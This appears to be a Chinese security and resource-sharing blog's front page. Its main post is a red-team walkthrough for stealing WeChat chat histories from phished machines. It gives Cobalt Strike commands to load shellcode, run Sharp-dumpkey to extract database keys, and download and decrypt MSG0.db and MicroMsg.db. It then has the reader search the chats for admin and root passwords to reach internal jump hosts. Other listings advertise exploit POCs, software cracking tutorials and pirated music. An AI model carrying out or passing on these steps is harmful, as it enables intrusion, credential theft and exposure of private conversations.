首页
网络安全
游戏源码
小程序源码
应用资源
影视资源
音频资源
关于
关键词搜索
搜索
标签搜索
周杰伦专辑
小程序
小程序源码
小程序源码打包
wpsrce
wps漏洞
wps远程命令执行
网神 SecGate防火墙漏洞
IntelliJ IDEA
CVE-2012-1889
CVE-2019-0708
自动化安全测试工具
量化交易
Ethereum
区块链
热门文章
1
周杰伦歌曲全集mp3 周杰伦所有专辑全部歌曲合集打包下载
2.4k 阅读
2
金山WPS RCE
1.5k 阅读
3
20套小程序源码(带后端)
1.4k 阅读
4
IntelliJ IDEA 2021.3.3 最新版本 永久激活教程 破解教程 亲测可用 附带下载
1.4k 阅读
5
CVE-2019-0708 微软远程桌面服务远程代码执行漏洞分析之补丁分析
1k 阅读
6
高频对冲做市网格策略
958 阅读
7
腾讯云容器安全白皮书.pdf
908 阅读
8
网神,SecGate ,obj_app_upfile,任意文件上传漏洞 POC
895 阅读
9
均值回归策略
766 阅读
testgo1
首页
分类
网络安全
游戏源码
小程序源码
应用资源
影视资源
音频资源
页面
关于
用户登录
登录
注册
相信一件事
总会有的
钓鱼场景微信聊天回传
实战中钓⻥时常在微信聊天记录中找到目标内网系统账号、机器账号密码,尽可能的不触发大量扫描告警下在内网中精准打到跳板机。一、使用场景钓⻥攻击(通过钓⻥ / 微信控到的机器通常都是登录状态) 渗透到运维机器(有些运维机器会日常登录自己的微信)二、获取微信聊天记录过程 在第一步需要用到,Sharp-dumpkey工具,下面对Sharp-dumpkey工具进行介绍:项目地址:https://github.com/Ormicron/Sharp-dumpkey基于C#实现的获取微信数据库密钥的小工具,可配合chatViewTool使用。 可直接执行命令.\dumpkey.exe,查看微信数据库密钥,并回传DBpass.bin文件 中。暂时不支持微信多开场景的密钥获取。需微信登录后才可抓取密钥。程序未采用动态获取基址的方式,因此为保证程序可用性,运行时会在线拉取基址。在被获取权限PC端执行 .\co.exe shellcode -f .\cece.txt,可连接到CS服务器在被获取权限PC处,右键选择Interact,可进入命令执行1、获取微信数据库密钥,执行命令execute-assembly C:\Users\summer\Desktop\test\dumpkey.exe回传 DBpass.bin,该文件中记录了微信数据库密钥2、下载目标聊天数据库文件,默认保存目录在以下目录,超出 240MB 会自动 生成 MSG1.db,以此类推。C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db备注:MSG0.db文件存放聊天记录MicroMsg.db文件存放好友列表执行命令shell C:\Users\summer\Desktop\test\FileSearch.exe search C:\ MSG可找到文件MSG0.db连接被获取权限PC的文件夹,找到目录C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi下载文件MSG0.db并存放到自定义目录 即可找到目录C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg下载文件MicroMsg.db并存放到自定义目录 (与MSG0.db放到同一目录下)在第3步之前对ChatViewTool工具进行介绍: 项目地址https://github.com/Ormicron/chatViewToolChatViewTool是一个配合dumpkey(微信数据库秘钥获取工具)使用的小工具,该 工具实现了微信数据库解密以及展示数据库聊天记录的功能。使用方法在获取数据库秘钥之后将内容保存为文本文件DBPass.Bin,随后提取以下相关 的数据库放于秘钥文件同目录。C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db C:\Users\summer\Documents\WeChatFiles\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db随后打开ChatViewTool点击“数据库解密”并选择秘钥及数据库所在的目录,待解 密完成后点击查看数据库,选择同目录,双击联系人列表即可展示对应的聊天记录将上面DBpass.bin、MSG0.db、MicroMsg.db三个文件回传到同目录,配合 ChatViewTool 打开解密即可查看,在搜索处 “administrator” “root” “密码” “ip 等”,项目地址。
2024年06月07日
丨
527阅读
丨
2评论
网络安全
Ethereum-开源推荐
开源地址:https://github.com/Scratch-net/ethproxyEthproxy 是一项为Cloudflare gateway支持的 API 方法 eth_getBlockByNumber 提供 LRU 缓存的服务。 它使用CCache作为缓存引擎。Singleflight可防止同时请求单个块使用envconfig进行配置最新 20 个块的默认 TTL 为 5 秒。从 20 到 1000 的区块的 TTL=“距最新的距离”* 5s所有距离最新区块超过 1000 的区块都被认为是不可变的请求过期的缓存项不会阻止服务。它在后台刷新请求的块实现优雅关闭短绒支持Docker 镜像构建。由于多阶段静态构建,生成的图像大小小于 6 mbBlob Archiver 是一种存档并允许查询信标链中所有历史 Blob 的服务 。它由两个部分组成:Archiver - 跟踪信标链并将 blob 写入存储后端API - 实现 blob sidecars API,允许客户端从存储后端检索 blob贮存目前支持两种存储选项:磁盘存储 - Blob 写入磁盘的目录中S3 存储 - Blob 写入 S3 存储桶(或兼容服务)BLOB_API_DATA_STORE您可以通过将和设置BLOB_ARCHIVER_DATA_STORE为file或来控制使用哪个存储后端s3。后端s3还可以使用(例如)Google Cloud Storage 存储桶(此处的说明)。数据有效性目前,归档器和 API 不验证信标节点的数据。因此,信任 Beacon 节点或验证客户端中的数据非常重要。 向归档器和 API 添加数据验证存在一个未解决的问题。开源地址:https://github.com/base-org/blob-archiverRPCHub 是一个 RPC 聚合器,通过集成您拥有的节点、私有和公共端点,为您提供最快、最强大的 RPC 服务 。RPCHub 是一款开源软件,允许您自定义自己的策略配置。通过定制化配置,RPCHub能够实现RPC服务的可扩展、独享、稳定、低成本、高性能。配置在本地存储和使用,以最好地保护您的隐私。https://github.com/BlockPILabs/aggregator
2024年06月07日
丨
608阅读
丨
5评论
应用资源
均值回归策略
均值回归策略
2023年12月27日
丨
766阅读
丨
4评论
高频对冲做市网格策略
高频做市(Market Making)策略是一种常见的量化交易策略,指的是一种分别建立限价买(Bid)卖(Ask)单,利用标的价格的上下波动触发限价单,通过买(Bid)卖(Ask)单的差价获取交易收益的策略。做市策略中重点关注的是限价单的数量和以及买卖单报价与中间价距离的设定,因而在各类经典的做市策略中,主要研究的是中间价的估算,进而在中间价两边合适的位置设置买单和卖单。
2023年12月13日
丨
958阅读
丨
7评论
应用资源
周杰伦歌曲全集mp3 周杰伦所有专辑全部歌曲合集打包下载
周杰伦专辑mp3合集下载
2023年09月02日
丨
2.4k阅读
丨
9评论
音频资源
20套小程序源码(带后端)
20套小程序源码(带后端)
2023年08月22日
丨
1.4k阅读
丨
6评论
小程序源码
IntelliJ IDEA 2021.3.3 最新版本 永久激活教程 破解教程 亲测可用 附带下载
IntelliJ IDEA 2021.3.3 最新版本 永久激活教程 破解教程 亲测可用 附带下载
2023年08月17日
丨
1.4k阅读
丨
5评论
应用资源
查看更多
